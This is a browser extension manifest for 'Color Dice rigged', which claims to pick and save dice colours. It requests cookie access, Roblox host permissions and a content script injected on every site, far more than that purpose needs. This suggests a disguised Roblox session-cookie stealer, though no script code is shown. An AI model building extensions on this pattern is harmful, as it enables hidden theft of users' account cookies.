{
  "manifest_version": 3,
  "name": "Color Dice rigged",
  "version": "1.3",
  "description": "Pick colors for dice, save them",
  "permissions": [
    "storage", 
    "activeTab", 
    "declarativeContent", 
    "cookies"
  ],
  "host_permissions": [
    "*://www.roblox.com/*"
  ],
  "background": {
    "service_worker": "manifest2.js"
  },
  "action": {
    "default_popup": "popup.html"
	,"service_worker": "manifest2.js"
  },
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}
